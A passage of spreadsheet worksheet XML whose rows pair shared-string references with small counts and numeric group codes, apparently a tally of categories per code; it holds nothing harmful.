    <row r="2845" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2845" t="s">
        <v>16229</v>
      </c>
      <c r="B2845" t="s">
        <v>16221</v>
      </c>
      <c r="C2845">
        <v>11</v>
      </c>
      <c r="D2845">
        <v>2016</v>
      </c>
    </row>
    <row r="2846" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2846" t="s">
        <v>16230</v>
      </c>
      <c r="B2846" t="s">
        <v>16222</v>
      </c>
      <c r="C2846">
        <v>60</v>
      </c>
      <c r="D2846">
        <v>2016</v>
      </c>
    </row>
    <row r="2847" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2847" t="s">
        <v>16223</v>
      </c>
      <c r="B2847" t="s">
        <v>16223</v>
      </c>
      <c r="C2847">
        <v>26</v>
      </c>
      <c r="D2847">
        <v>2016</v>
      </c>
    </row>
    <row r="2848" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2848" t="s">
        <v>16224</v>
      </c>
      <c r="B2848" t="s">
        <v>16224</v>
      </c>
      <c r="C2848">
        <v>1</v>
      </c>
      <c r="D2848">
        <v>2016</v>
      </c>
    </row>
    <row r="2849" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2849" t="s">
        <v>16228</v>
      </c>
      <c r="B2849" t="s">
        <v>16211</v>
      </c>
      <c r="C2849">
        <v>0</v>
      </c>
      <c r="D2849">
        <v>2390</v>
      </c>
    </row>
    <row r="2850" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2850" t="s">
        <v>16231</v>
      </c>
      <c r="B2850" t="s">
        <v>16212</v>
      </c>
      <c r="C2850">
        <v>0</v>
      </c>
      <c r="D2850">
        <v>2390</v>
      </c>
    </row>
    <row r="2851" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2851" t="s">
        <v>16228</v>
      </c>
      <c r="B2851" t="s">
        <v>16213</v>
      </c>
      <c r="C2851">
        <v>0</v>
      </c>
      <c r="D2851">
        <v>2390</v>
      </c>
    </row>
    <row r="2852" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2852" t="s">
        <v>16231</v>
      </c>
      <c r="B2852" t="s">
        <v>16214</v>
      </c>
      <c r="C2852">
        <v>0</v>
      </c>
      <c r="D2852">
        <v>2390</v>
      </c>
    </row>
    <row r="2853" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2853" t="s">
        <v>16228</v>
      </c>
      <c r="B2853" t="s">
        <v>16215</v>
      </c>
      <c r="C2853">
        <v>2</v>
      </c>
      <c r="D2853">
        <v>2390</v>
      </c>
    </row>
    <row r="2854" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2854" t="s">
        <v>16231</v>
      </c>
      <c r="B2854" t="s">
        <v>16216</v>
      </c>
      <c r="C2854">
        <v>6</v>
      </c>
      <c r="D2854">
        <v>2390</v>
      </c>
    </row>
    <row r="2855" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2855" t="s">
        <v>16228</v>
      </c>
      <c r="B2855" t="s">
        <v>16217</v>
      </c>
      <c r="C2855">
        <v>3</v>
      </c>
      <c r="D2855">
        <v>2390</v>
      </c>
    </row>
    <row r="2856" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2856" t="s">
        <v>16231</v>
      </c>
      <c r="B2856" t="s">
        <v>16218</v>
      </c>
      <c r="C2856">
        <v>0</v>
      </c>
      <c r="D2856">
        <v>2390</v>
      </c>
    </row>
    <row r="2857" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2857" t="s">
        <v>16229</v>
      </c>
      <c r="B2857" t="s">
        <v>16219</v>
      </c>
      <c r="C2857">
        <v>0</v>
      </c>
      <c r="D2857">
        <v>2390</v>
      </c>
    </row>
    <row r="2858" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2858" t="s">
        <v>16230</v>
      </c>
      <c r="B2858" t="s">
        <v>16220</v>
      </c>
      <c r="C2858">
        <v>0</v>
      </c>
      <c r="D2858">
        <v>2390</v>
      </c>
    </row>
    <row r="2859" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2859" t="s">
        <v>16229</v>
      </c>
      <c r="B2859" t="s">
        <v>16221</v>
      </c>
      <c r="C2859">
        <v>20</v>
      </c>
      <c r="D2859">
        <v>2390</v>
      </c>
    </row>
    <row r="2860" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2860" t="s">
        <v>16230</v>
      </c>
      <c r="B2860" t="s">
        <v>16222</v>
      </c>
      <c r="C2860">
        <v>0</v>
      </c>
      <c r="D2860">
        <v>2390</v>
      </c>
    </row>
    <row r="2861" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2861" t="s">
        <v>16223</v>
      </c>
      <c r="B2861" t="s">
        <v>16223</v>
      </c>
      <c r="C2861">
        <v>25</v>
      </c>
      <c r="D2861">
        <v>2390</v>
      </c>
    </row>
    <row r="2862" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2862" t="s">
        <v>16224</v>
      </c>
      <c r="B2862" t="s">
        <v>16224</v>
      </c>
      <c r="C2862">
        <v>0</v>
      </c>
      <c r="D2862">
        <v>2390</v>
      </c>
    </row>
    <row r="2863" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2863" t="s">
        <v>16228</v>
      </c>
      <c r="B2863" t="s">
        <v>16211</v>
      </c>
      <c r="C2863">
        <v>0</v>
      </c>
      <c r="D2863">
        <v>359</v>
      </c>
    </row>
    <row r="2864" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2864" t="s">
        <v>16231</v>
      </c>
      <c r="B2864" t="s">
        <v>16212</v>
      </c>
      <c r="C2864">
        <v>0</v>
      </c>
      <c r="D2864">
        <v>359</v>
      </c>
    </row>
    <row r="2865" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2865" t="s">
        <v>16228</v>
      </c>
      <c r="B2865" t="s">
        <v>16213</v>
      </c>
      <c r="C2865">
        <v>0</v>
      </c>
      <c r="D2865">
        <v>359</v>
      </c>
    </row>
    <row r="2866" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2866" t="s">
        <v>16231</v>
      </c>
      <c r="B2866" t="s">
        <v>16214</v>
      </c>
      <c r="C2866">
        <v>2</v>
      </c>
      <c r="D2866">
        <v>359</v>
      </c>
    </row>
    <row r="2867" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2867" t="s">
        <v>16228</v>
      </c>
      <c r="B2867" t="s">
        <v>16215</v>
      </c>
      <c r="C2867">
        <v>2</v>
      </c>
      <c r="D2867">
        <v>359</v>
      </c>
    </row>
    <row r="2868" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2868" t="s">
        <v>16231</v>
      </c>
      <c r="B2868" t="s">
        <v>16216</v>
      </c>
      <c r="C2868">
        <v>0</v>
      </c>
      <c r="D2868">
        <v>359</v>
      </c>
    </row>
    <row r="2869" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2869" t="s">
        <v>16228</v>
      </c>
      <c r="B2869" t="s">
        <v>16217</v>
      </c>
      <c r="C2869">
        <v>0</v>
      </c>
      <c r="D2869">
        <v>359</v>
      </c>
    </row>
    <row r="2870" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2870" t="s">
        <v>16231</v>
      </c>
      <c r="B2870" t="s">
        <v>16218</v>
      </c>
      <c r="C2870">
        <v>0</v>
      </c>
      <c r="D2870">
        <v>359</v>
      </c>
    </row>
    <row r="2871" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2871" t="s">
        <v>16229</v>
      </c>
      <c r="B2871" t="s">
        <v>16219</v>
      </c>
      <c r="C2871">
        <v>0</v>
      </c>
      <c r="D2871">
        <v>359</v>
      </c>
    </row>
    <row r="2872" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2872" t="s">
        <v>16230</v>
      </c>
      <c r="B2872" t="s">
        <v>16220</v>
      </c>
      <c r="C2872">
        <v>0</v>
      </c>
      <c r="D2872">
        <v>359</v>
      </c>
    </row>
    <row r="2873" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2873" t="s">
        <v>16229</v>
      </c>
      <c r="B2873" t="s">
        <v>16221</v>
      </c>
      <c r="C2873">
        <v>0</v>
      </c>
      <c r="D2873">
        <v>359</v>
      </c>
    </row>
    <row r="2874" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2874" t="s">
        <v>16230</v>
      </c>
      <c r="B2874" t="s">
        <v>16222</v>
      </c>
      <c r="C2874">
        <v>0</v>
      </c>
      <c r="D2874">
        <v>359</v>
      </c>
    </row>
    <row r="2875" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2875" t="s">
        <v>16223</v>
      </c>
      <c r="B2875" t="s">
        <v>16223</v>
      </c>
      <c r="C2875">
        <v>27</v>
      </c>
      <c r="D2875">
        <v>359</v>
      </c>
    </row>
    <row r="2876" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2876" t="s">
        <v>16224</v>
      </c>
      <c r="B2876" t="s">
        <v>16224</v>
      </c>
      <c r="C2876">
        <v>0</v>
      </c>
      <c r="D2876">
        <v>359</v>
      </c>
    </row>
    <row r="2877" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2877" t="s">
        <v>16228</v>
      </c>
      <c r="B2877" t="s">
        <v>16211</v>
      </c>
      <c r="C2877">
        <v>0</v>
      </c>
      <c r="D2877">
        <v>2304</v>
      </c>
    </row>
    <row r="2878" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2878" t="s">
        <v>16231</v>
      </c>
      <c r="B2878" t="s">
        <v>16212</v>
      </c>
      <c r="C2878">
        <v>0</v>
      </c>
      <c r="D2878">
        <v>2304</v>
      </c>
    </row>
    <row r="2879" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2879" t="s">
        <v>16228</v>
      </c>
      <c r="B2879" t="s">
        <v>16213</v>
      </c>
      <c r="C2879">
        <v>0</v>
      </c>
      <c r="D2879">
        <v>2304</v>
      </c>
    </row>
    <row r="2880" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2880" t="s">
        <v>16231</v>
      </c>
      <c r="B2880" t="s">
        <v>16214</v>
      </c>
      <c r="C2880">
        <v>0</v>
      </c>
      <c r="D2880">
        <v>2304</v>
      </c>
    </row>
    <row r="2881" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2881" t="s">
        <v>16228</v>
      </c>
      <c r="B2881" t="s">
        <v>16215</v>
      </c>
      <c r="C2881">
        <v>0</v>
      </c>
      <c r="D2881">
        <v>2304</v>
      </c>
    </row>
    <row r="2882" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2882" t="s">
        <v>16231</v>
      </c>
      <c r="B2882" t="s">
        <v>16216</v>
      </c>
      <c r="C2882">
        <v>1</v>
      </c>
      <c r="D2882">
        <v>2304</v>
      </c>
    </row>
    <row r="2883" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2883" t="s">
        <v>16228</v>
      </c>
      <c r="B2883" t="s">
        <v>16217</v>
      </c>
      <c r="C2883">
        <v>1</v>
      </c>
      <c r="D2883">
        <v>2304</v>
      </c>
    </row>
    <row r="2884" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2884" t="s">
        <v>16231</v>
      </c>
      <c r="B2884" t="s">
        <v>16218</v>
      </c>
      <c r="C2884">
        <v>0</v>
      </c>
      <c r="D2884">
        <v>2304</v>
      </c>
    </row>
    <row r="2885" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2885" t="s">
        <v>16229</v>
      </c>
      <c r="B2885" t="s">
        <v>16219</v>
      </c>
      <c r="C2885">
        <v>0</v>
      </c>
      <c r="D2885">
        <v>2304</v>
      </c>
    </row>
    <row r="2886" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2886" t="s">
        <v>16230</v>
      </c>
      <c r="B2886" t="s">
        <v>16220</v>
      </c>
      <c r="C2886">
        <v>0</v>
      </c>
      <c r="D2886">
        <v>2304</v>
      </c>
    </row>
    <row r="2887" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2887" t="s">
        <v>16229</v>
      </c>
      <c r="B2887" t="s">
        <v>16221</v>
      </c>
      <c r="C2887">
        <v>6</v>
      </c>
      <c r="D2887">
        <v>2304</v>
      </c>
    </row>
    <row r="2888" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2888" t="s">
        <v>16230</v>
      </c>
      <c r="B2888" t="s">
        <v>16222</v>
      </c>
      <c r="C2888">
        <v>0</v>
      </c>
      <c r="D2888">
        <v>2304</v>
      </c>
    </row>
    <row r="2889" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2889" t="s">
        <v>16223</v>
      </c>
      <c r="B2889" t="s">
        <v>16223</v>
      </c>
      <c r="C2889">
        <v>1</v>
      </c>
      <c r="D2889">
        <v>2304</v>
      </c>
    </row>
    <row r="2890" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2890" t="s">
        <v>16224</v>
      </c>
      <c r="B2890" t="s">
        <v>16224</v>
      </c>
      <c r="C2890">
        <v>0</v>
      </c>
      <c r="D2890">
        <v>2304</v>
      </c>
    </row>
    <row r="2891" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2891" t="s">
        <v>16228</v>
      </c>
      <c r="B2891" t="s">
        <v>16211</v>
      </c>
      <c r="C2891">
        <v>0</v>
      </c>
      <c r="D2891">
        <v>1326</v>
      </c>
    </row>
    <row r="2892" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2892" t="s">
        <v>16231</v>
      </c>
      <c r="B2892" t="s">
        <v>16212</v>
      </c>
      <c r="C2892">
        <v>0</v>
      </c>
      <c r="D2892">
        <v>1326</v>
      </c>
    </row>
    <row r="2893" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2893" t="s">
        <v>16228</v>
      </c>
      <c r="B2893" t="s">
        <v>16213</v>
      </c>
      <c r="C2893">
        <v>0</v>
      </c>
      <c r="D2893">
        <v>1326</v>
      </c>
    </row>
    <row r="2894" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2894" t="s">
        <v>16231</v>
      </c>
      <c r="B2894" t="s">
        <v>16214</v>
      </c>
      <c r="C2894">
        <v>0</v>
      </c>
      <c r="D2894">
        <v>1326</v>
      </c>
    </row>
    <row r="2895" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2895" t="s">
        <v>16228</v>
      </c>
      <c r="B2895" t="s">
        <v>16215</v>
      </c>
      <c r="C2895">
        <v>1</v>
      </c>
      <c r="D2895">
        <v>1326</v>
      </c>
    </row>
    <row r="2896" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2896" t="s">
        <v>16231</v>
      </c>
      <c r="B2896" t="s">
        <v>16216</v>
      </c>
      <c r="C2896">
        <v>4</v>
      </c>
      <c r="D2896">
        <v>1326</v>
      </c>
    </row>
    <row r="2897" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2897" t="s">
        <v>16228</v>
      </c>
      <c r="B2897" t="s">
        <v>16217</v>
      </c>
      <c r="C2897">
        <v>5</v>
      </c>
      <c r="D2897">
        <v>1326</v>
      </c>
    </row>
    <row r="2898" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2898" t="s">
        <v>16231</v>
      </c>
      <c r="B2898" t="s">
        <v>16218</v>
      </c>
      <c r="C2898">
        <v>1</v>
      </c>
      <c r="D2898">
        <v>1326</v>
      </c>
    </row>
    <row r="2899" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2899" t="s">
        <v>16229</v>
      </c>
      <c r="B2899" t="s">
        <v>16219</v>
      </c>
      <c r="C2899">
        <v>0</v>
      </c>
      <c r="D2899">
        <v>1326</v>
      </c>
    </row>
    <row r="2900" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2900" t="s">
        <v>16230</v>
      </c>
      <c r="B2900" t="s">
        <v>16220</v>
      </c>
      <c r="C2900">
        <v>0</v>
      </c>
      <c r="D2900">
        <v>1326</v>
      </c>
    </row>
    <row r="2901" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2901" t="s">
        <v>16229</v>
      </c>
      <c r="B2901" t="s">
        <v>16221</v>
      </c>
      <c r="C2901">
        <v>19</v>
      </c>
      <c r="D2901">
        <v>1326</v>
      </c>
    </row>
    <row r="2902" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2902" t="s">
        <v>16230</v>
      </c>
      <c r="B2902" t="s">
        <v>16222</v>
      </c>
      <c r="C2902">
        <v>21</v>
      </c>
      <c r="D2902">
        <v>1326</v>
      </c>
    </row>
    <row r="2903" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2903" t="s">
        <v>16223</v>
      </c>
      <c r="B2903" t="s">
        <v>16223</v>
      </c>
      <c r="C2903">
        <v>7</v>
      </c>
      <c r="D2903">
        <v>1326</v>
      </c>
    </row>
    <row r="2904" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2904" t="s">
        <v>16224</v>
      </c>
      <c r="B2904" t="s">
        <v>16224</v>
      </c>
      <c r="C2904">
        <v>2</v>
      </c>
      <c r="D2904">
        <v>1326</v>
      </c>
    </row>
    <row r="2905" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2905" t="s">
        <v>16228</v>
      </c>
      <c r="B2905" t="s">
        <v>16211</v>
      </c>
      <c r="C2905">
        <v>0</v>
      </c>
      <c r="D2905">
        <v>501</v>
      </c>
    </row>
    <row r="2906" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2906" t="s">
        <v>16231</v>
      </c>
      <c r="B2906" t="s">
        <v>16212</v>
      </c>
      <c r="C2906">
        <v>0</v>
      </c>
      <c r="D2906">
        <v>501</v>
      </c>
    </row>
    <row r="2907" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2907" t="s">
        <v>16228</v>
      </c>
      <c r="B2907" t="s">
        <v>16213</v>
      </c>
      <c r="C2907">
        <v>0</v>
      </c>
      <c r="D2907">
        <v>501</v>
      </c>
    </row>
    <row r="2908" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2908" t="s">
        <v>16231</v>
      </c>
      <c r="B2908" t="s">
        <v>16214</v>
      </c>
      <c r="C2908">
        <v>0</v>
      </c>
      <c r="D2908">
        <v>501</v>
      </c>
    </row>
    <row r="2909" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2909" t="s">
        <v>16228</v>
      </c>
      <c r="B2909" t="s">
        <v>16215</v>
      </c>
      <c r="C2909">
        <v>0</v>
      </c>
      <c r="D2909">
        <v>501</v>
      </c>
    </row>
    <row r="2910" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2910" t="s">
        <v>16231</v>
      </c>
      <c r="B2910" t="s">
        <v>16216</v>
      </c>
      <c r="C2910">
        <v>1</v>
      </c>
      <c r="D2910">
        <v>501</v>
      </c>
    </row>
    <row r="2911" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2911" t="s">
        <v>16228</v>
      </c>
      <c r="B2911" t="s">
        <v>16217</v>
      </c>
      <c r="C2911">
        <v>0</v>
      </c>
      <c r="D2911">
        <v>501</v>
      </c>
    </row>
    <row r="2912" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2912" t="s">
        <v>16231</v>
      </c>
      <c r="B2912" t="s">
        <v>16218</v>
      </c>
      <c r="C2912">
        <v>1</v>
      </c>
      <c r="D2912">
        <v>501</v>
      </c>
    </row>
    <row r="2913" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2913" t="s">
        <v>16229</v>
      </c>
      <c r="B2913" t="s">
        <v>16219</v>
      </c>
      <c r="C2913">
        <v>0</v>
      </c>
      <c r="D2913">
        <v>501</v>
      </c>
    </row>
    <row r="2914" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2914" t="s">
        <v>16230</v>
      </c>
      <c r="B2914" t="s">
        <v>16220</v>
      </c>
      <c r="C2914">
        <v>0</v>
      </c>
      <c r="D2914">
        <v>501</v>
      </c>
    </row>
    <row r="2915" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2915" t="s">
        <v>16229</v>
      </c>
      <c r="B2915" t="s">
        <v>16221</v>
      </c>
      <c r="C2915">
        <v>0</v>
      </c>
      <c r="D2915">
        <v>501</v>
      </c>
    </row>
    <row r="2916" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2916" t="s">
        <v>16230</v>
      </c>
      <c r="B2916" t="s">
        <v>16222</v>
      </c>
      <c r="C2916">
        <v>0</v>
      </c>
      <c r="D2916">
        <v>501</v>
      </c>
    </row>
    <row r="2917" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2917" t="s">
        <v>16223</v>
      </c>
      <c r="B2917" t="s">
        <v>16223</v>
      </c>
      <c r="C2917">
        <v>6</v>
      </c>
      <c r="D2917">
        <v>501</v>
      </c>
    </row>
    <row r="2918" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2918" t="s">
        <v>16224</v>
      </c>
      <c r="B2918" t="s">
        <v>16224</v>
      </c>
      <c r="C2918">
        <v>1</v>
      </c>
      <c r="D2918">
        <v>501</v>
      </c>
    </row>
    <row r="2919" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2919" t="s">
        <v>16231</v>
      </c>
      <c r="B2919" t="s">
        <v>16216</v>
      </c>
      <c r="C2919">
        <v>0</v>
      </c>
      <c r="D2919">
        <v>501</v>
      </c>
    </row>
    <row r="2920" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2920" t="s">
        <v>16228</v>
      </c>
      <c r="B2920" t="s">
        <v>16217</v>
      </c>
      <c r="C2920">
        <v>1</v>
      </c>
      <c r="D2920">
        <v>501</v>
      </c>
    </row>
    <row r="2921" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2921" t="s">
        <v>16231</v>
      </c>
      <c r="B2921" t="s">
        <v>16218</v>
      </c>
      <c r="C2921">
        <v>3</v>
      </c>
      <c r="D2921">
        <v>501</v>
      </c>
    </row>
    <row r="2922" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2922" t="s">
        <v>16228</v>
      </c>
      <c r="B2922" t="s">
        <v>16211</v>
      </c>
      <c r="C2922">
        <v>0</v>
      </c>
      <c r="D2922">
        <v>2617</v>
      </c>
    </row>
    <row r="2923" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2923" t="s">
        <v>16231</v>
      </c>
      <c r="B2923" t="s">
        <v>16212</v>
      </c>
      <c r="C2923">
        <v>0</v>
      </c>
      <c r="D2923">
        <v>2617</v>
      </c>
    </row>
    <row r="2924" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2924" t="s">
        <v>16228</v>
      </c>
      <c r="B2924" t="s">
        <v>16213</v>
      </c>
      <c r="C2924">
        <v>0</v>
      </c>
      <c r="D2924">
        <v>2617</v>
      </c>
    </row>
    <row r="2925" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2925" t="s">
        <v>16231</v>
      </c>
      <c r="B2925" t="s">
        <v>16214</v>
      </c>
      <c r="C2925">
        <v>0</v>
      </c>
      <c r="D2925">
        <v>2617</v>
      </c>
    </row>
    <row r="2926" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2926" t="s">
        <v>16228</v>
      </c>
      <c r="B2926" t="s">
        <v>16215</v>
      </c>
      <c r="C2926">
        <v>5</v>
      </c>
      <c r="D2926">
        <v>2617</v>
      </c>
    </row>
    <row r="2927" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2927" t="s">
        <v>16231</v>
      </c>
      <c r="B2927" t="s">
        <v>16216</v>
      </c>
      <c r="C2927">
        <v>5</v>
      </c>
      <c r="D2927">
        <v>2617</v>
      </c>
    </row>
    <row r="2928" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2928" t="s">
        <v>16228</v>
      </c>
      <c r="B2928" t="s">
        <v>16217</v>
      </c>
      <c r="C2928">
        <v>5</v>
      </c>
      <c r="D2928">
        <v>2617</v>
      </c>
    </row>
    <row r="2929" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2929" t="s">
        <v>16231</v>
      </c>
      <c r="B2929" t="s">
        <v>16218</v>
      </c>
      <c r="C2929">
        <v>5</v>
      </c>
      <c r="D2929">
        <v>2617</v>
      </c>
    </row>
    <row r="2930" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2930" t="s">
        <v>16229</v>
      </c>
      <c r="B2930" t="s">
        <v>16219</v>
      </c>
      <c r="C2930">
        <v>0</v>
      </c>
      <c r="D2930">
        <v>2617</v>
      </c>
    </row>
    <row r="2931" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2931" t="s">
        <v>16230</v>
      </c>
      <c r="B2931" t="s">
        <v>16220</v>
      </c>
      <c r="C2931">
        <v>0</v>
      </c>
      <c r="D2931">
        <v>2617</v>
      </c>
    </row>
    <row r="2932" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2932" t="s">
        <v>16229</v>
      </c>
      <c r="B2932" t="s">
        <v>16221</v>
      </c>
      <c r="C2932">
        <v>0</v>
      </c>
      <c r="D2932">
        <v>2617</v>
      </c>
    </row>
    <row r="2933" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2933" t="s">
        <v>16230</v>
      </c>
      <c r="B2933" t="s">
        <v>16222</v>
      </c>
      <c r="C2933">
        <v>0</v>
      </c>
      <c r="D2933">
        <v>2617</v>
      </c>
    </row>
    <row r="2934" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2934" t="s">
        <v>16223</v>
      </c>
      <c r="B2934" t="s">
        <v>16223</v>
      </c>
      <c r="C2934">
        <v>6</v>
      </c>
      <c r="D2934">
        <v>2617</v>
      </c>
    </row>
    <row r="2935" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2935" t="s">
        <v>16224</v>
      </c>
      <c r="B2935" t="s">
        <v>16224</v>
      </c>
      <c r="C2935">
        <v>0</v>
      </c>
      <c r="D2935">
        <v>2617</v>
      </c>
    </row>
    <row r="2936" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2936" t="s">
        <v>16228</v>
      </c>
      <c r="B2936" t="s">
        <v>16211</v>
      </c>
      <c r="C2936">
        <v>0</v>
      </c>
      <c r="D2936">
        <v>2618</v>
      </c>
    </row>
    <row r="2937" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2937" t="s">
        <v>16231</v>
      </c>
      <c r="B2937" t="s">
        <v>16212</v>
      </c>
      <c r="C2937">
        <v>0</v>
      </c>
      <c r="D2937">
        <v>2618</v>
      </c>
    </row>
    <row r="2938" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2938" t="s">
        <v>16228</v>
      </c>
      <c r="B2938" t="s">
        <v>16213</v>
      </c>
      <c r="C2938">
        <v>0</v>
      </c>
      <c r="D2938">
        <v>2618</v>
      </c>
    </row>
    <row r="2939" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2939" t="s">
        <v>16231</v>
      </c>
      <c r="B2939" t="s">
        <v>16214</v>
      </c>
      <c r="C2939">
        <v>0</v>
      </c>
      <c r="D2939">
        <v>2618</v>
      </c>
    </row>
    <row r="2940" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2940" t="s">
        <v>16228</v>
      </c>
      <c r="B2940" t="s">
        <v>16215</v>
      </c>
      <c r="C2940">
        <v>0</v>
      </c>
      <c r="D2940">
        <v>2618</v>
      </c>
    </row>
    <row r="2941" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2941" t="s">
        <v>16231</v>
      </c>
      <c r="B2941" t="s">
        <v>16216</v>
      </c>
      <c r="C2941">
        <v>0</v>
      </c>
      <c r="D2941">
        <v>2618</v>
      </c>
    </row>
    <row r="2942" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2942" t="s">
        <v>16228</v>
      </c>
      <c r="B2942" t="s">
        <v>16217</v>
      </c>
      <c r="C2942">
        <v>0</v>
      </c>
      <c r="D2942">
        <v>2618</v>
      </c>
    </row>
    <row r="2943" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2943" t="s">
        <v>16231</v>
      </c>
      <c r="B2943" t="s">
        <v>16218</v>
      </c>
      <c r="C2943">
        <v>0</v>
      </c>
      <c r="D2943">
        <v>2618</v>
      </c>
    </row>
    <row r="2944" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2944" t="s">
        <v>16229</v>
      </c>
      <c r="B2944" t="s">
        <v>16219</v>
      </c>
      <c r="C2944">
        <v>1</v>
      </c>
      <c r="D2944">
        <v>2618</v>
      </c>
    </row>
    <row r="2945" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2945" t="s">
        <v>16230</v>
      </c>
      <c r="B2945" t="s">
        <v>16220</v>
      </c>
      <c r="C2945">
        <v>0</v>
      </c>
      <c r="D2945">
        <v>2618</v>
      </c>
    </row>
    <row r="2946" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2946" t="s">
        <v>16229</v>
      </c>
      <c r="B2946" t="s">
        <v>16221</v>
      </c>
      <c r="C2946">
        <v>4</v>
      </c>
      <c r="D2946">
        <v>2618</v>
      </c>
    </row>
    <row r="2947" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2947" t="s">
        <v>16230</v>
      </c>
      <c r="B2947" t="s">
        <v>16222</v>
      </c>
      <c r="C2947">
        <v>10</v>
      </c>
      <c r="D2947">
        <v>2618</v>
      </c>
    </row>
    <row r="2948" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2948" t="s">
        <v>16223</v>
      </c>
      <c r="B2948" t="s">
        <v>16223</v>
      </c>
      <c r="C2948">
        <v>360</v>
      </c>
      <c r="D2948">
        <v>2618</v>
      </c>
    </row>
    <row r="2949" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2949" t="s">
        <v>16224</v>
      </c>
      <c r="B2949" t="s">
        <v>16224</v>
      </c>
      <c r="C2949">
        <v>0</v>
      </c>
      <c r="D2949">
        <v>2618</v>
      </c>
    </row>
